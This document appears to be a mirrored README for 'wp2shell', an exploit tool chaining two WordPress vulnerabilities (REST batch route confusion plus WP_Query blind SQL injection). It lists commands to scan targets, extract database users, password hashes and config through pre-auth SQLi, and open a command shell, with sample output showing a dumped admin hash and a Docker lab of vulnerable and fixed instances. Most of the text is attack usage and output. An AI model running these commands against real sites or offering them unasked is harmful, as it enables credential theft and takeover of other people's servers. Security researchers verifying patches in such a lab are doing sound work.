Share
## https://sploitus.com/exploit?id=51C7D9F6-05E2-59F7-A602-3BD17495AF1C
# wp2shell โ€” CVE-2026-63030 + CVE-2026-60137

WordPress Pre-Auth RCE via REST Batch Route Confusion + WP_Query SQL Injection.

**Author:** dinhvaren | **Research:** Adam Kues / Searchlight Cyber

## Affected Versions

| Branch | Affected | Fixed |
|--------|----------|-------|
| 6.8.x | 6.8.0 โ€“ 6.8.5 | **6.8.6** |
| 6.9.x | 6.9.0 โ€“ 6.9.4 | **6.9.5** |
| 7.0.x | 7.0.0 โ€“ 7.0.1 | **7.0.2** |

---

## Tool: `poc/wp2shell.py`

### Commands

```bash
# Scan โ€” detect version + route confusion + blind SQLi
python3 wp2shell.py -t  scan
python3 wp2shell.py -t  scan -o report.json
python3 wp2shell.py -t  scan --sleep 2 --rounds 5
python3 wp2shell.py -t  -d scan            # debug mode

# Read โ€” extract data via pre-auth blind SQLi
python3 wp2shell.py -t  read --preset fingerprint
python3 wp2shell.py -t  read --preset users
python3 wp2shell.py -t  read --preset config
python3 wp2shell.py -t  read --query "SELECT VERSION()"
python3 wp2shell.py -t  read --preset users -o users.csv

# Shell โ€” post-auth RCE (requires admin credentials)
python3 wp2shell.py -t  shell -u admin -p  -c id
python3 wp2shell.py -t  shell -u admin -p          # interactive
```

### Flags

| Flag | Description |
|------|-------------|
| `-t, --target` | WordPress URL |
| `-o, --output` | Export results (`.json` / `.csv`) |
| `-d, --debug` | Show raw HTTP requests & responses |
| `--sleep` | SLEEP seconds for SQLi timing (default: 3) |
| `--rounds` | Timing rounds for scan (default: 3) |
| `--timeout` | HTTP timeout seconds (default: 30) |
| `--proxy` | HTTP proxy |
| `--ua` | Custom User-Agent |

### Scan Output (vulnerable)

```
[*] WordPress 7.0.1 detected via HTML meta generator
[-] VERSION IN AFFECTED RANGE
[+] Route confusion CONFIRMED (parse_path_failed, block_cannot_read, rest_batch_not_allowed)
[+] BLIND SQL INJECTION CONFIRMED (delta=2.0s)

[!!!] VULNERABLE โ€” wp2shell chain confirmed
```

### Read Output (pre-auth data extraction)

```
[+] db_version: 8.0.46
[+] db_user: wordpress@%
[+] db_name: wordpress
[+] hostname: mysql-vulnerable

[+] [1] admin
    Email : admin@localhost.local
    Hash  : $wp$2y$10$Y3mTlnQb4oziMW8S5wkD/e5lqBnR0rs9DhdKT9D0ZYQ3OMuBVwQ/y
    Roles : administrator
```

---

## Docker Lab

Local lab to **verify the exploit and test the tool** before scanning real targets.

### Purpose

- **Vulnerable** instance (7.0.1) โ€” confirms the tool detects correctly
- **Fixed** instance (7.0.2) โ€” confirms the tool reports SAFE
- Side-by-side demo: same tool, same request โ†’ old version vulnerable, new version not

### Endpoints

| Instance | URL | Version |
|----------|-----|---------|
| Vulnerable | http://127.0.0.1:8081 | WordPress 7.0.1 |
| Fixed | http://127.0.0.1:8082 | WordPress 7.0.2 |

### Quick Start

```powershell
cd lab

# Build & start
docker compose up -d

# Install WordPress on both
docker exec wp2shell-vulnerable wp --allow-root core install --url="http://127.0.0.1:8081" --title="wp2shell Vuln 7.0.1" --admin_user=admin --admin_password="wp2shell-local-lab" --admin_email=a@a.a --skip-email

docker exec wp2shell-fixed wp --allow-root core install --url="http://127.0.0.1:8082" --title="wp2shell Fixed 7.0.2" --admin_user=admin --admin_password="wp2shell-local-lab" --admin_email=a@a.a --skip-email

# Add .htaccess (see lab/README.md for full setup)

# Verify
cd ../poc
python3 wp2shell.py -t http://127.0.0.1:8081 scan    # โ†’ VULNERABLE
python3 wp2shell.py -t http://127.0.0.1:8082 scan    # โ†’ SAFE
```

### Management

```powershell
docker compose stop       # Stop (keep data)
docker compose start      # Start again
docker compose down -v    # Full reset
```

### Credentials (local lab only)

```
Admin  : admin / wp2shell-local-lab
MySQL  : root / wp2shell_root_local_only
```

---

## Project Structure

```
wp2shell/
โ”œโ”€โ”€ README.md              โ† This file
โ”œโ”€โ”€ analysis/
โ”‚   โ”œโ”€โ”€ root-cause.md      โ† Root cause + vulnerable vs fixed code
โ”‚   โ”œโ”€โ”€ chain.md           โ† Attack chain step-by-step
โ”‚   โ”œโ”€โ”€ diff.md            โ† Patch diff 7.0.1 โ†’ 7.0.2
โ”‚   โ””โ”€โ”€ poc.md             โ† Tool internals
โ”œโ”€โ”€ lab/
โ”‚   โ”œโ”€โ”€ README.md          โ† Full lab setup guide
โ”‚   โ”œโ”€โ”€ docker-compose.yml
โ”‚   โ””โ”€โ”€ Dockerfile
โ””โ”€โ”€ poc/
    โ””โ”€โ”€ wp2shell.py        โ† Main tool
```